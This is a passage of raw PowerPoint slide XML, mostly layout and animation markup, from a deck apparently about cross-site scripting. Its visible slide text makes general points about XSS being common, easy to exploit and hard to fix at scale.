                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7091102" y="536805"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Oval 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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0" name="TextBox 19"/>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URL</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2215430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JavaScript Value Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20834162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76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2691677"/>
            <a:ext cx="8229600" cy="1107996"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>misnomer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155302" y="2447287"/>
            <a:ext cx="4631335" cy="1661994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker driven </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>or JavaScript Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193114" y="2968225"/>
            <a:ext cx="8229600" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>web vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2283595" y="2691677"/>
            <a:ext cx="4397202" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Easy vulnerability to find via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auditing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1429732" y="2948174"/>
            <a:ext cx="6480180" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Easy vulnerability to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-478114" y="2763800"/>
            <a:ext cx="9131171" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Individual types of XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mostly straight forward </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>to fix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-215771" y="3042267"/>
            <a:ext cx="9131171" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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600">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Difficult to fix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS at scale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058664" y="2486801"/>
            <a:ext cx="4948857" cy="1661994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Easy to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>re-introduce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>in development</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562814" y="2835923"/>
            <a:ext cx="8229600" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="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chemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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chemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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chemeClr val="accent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a:t>Significant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> business and technical impact potential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406929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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>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5">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5">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27"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p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>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6">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40"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41" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="6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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="82" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="83" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="after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fade">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11">
                                            <p:txEl>
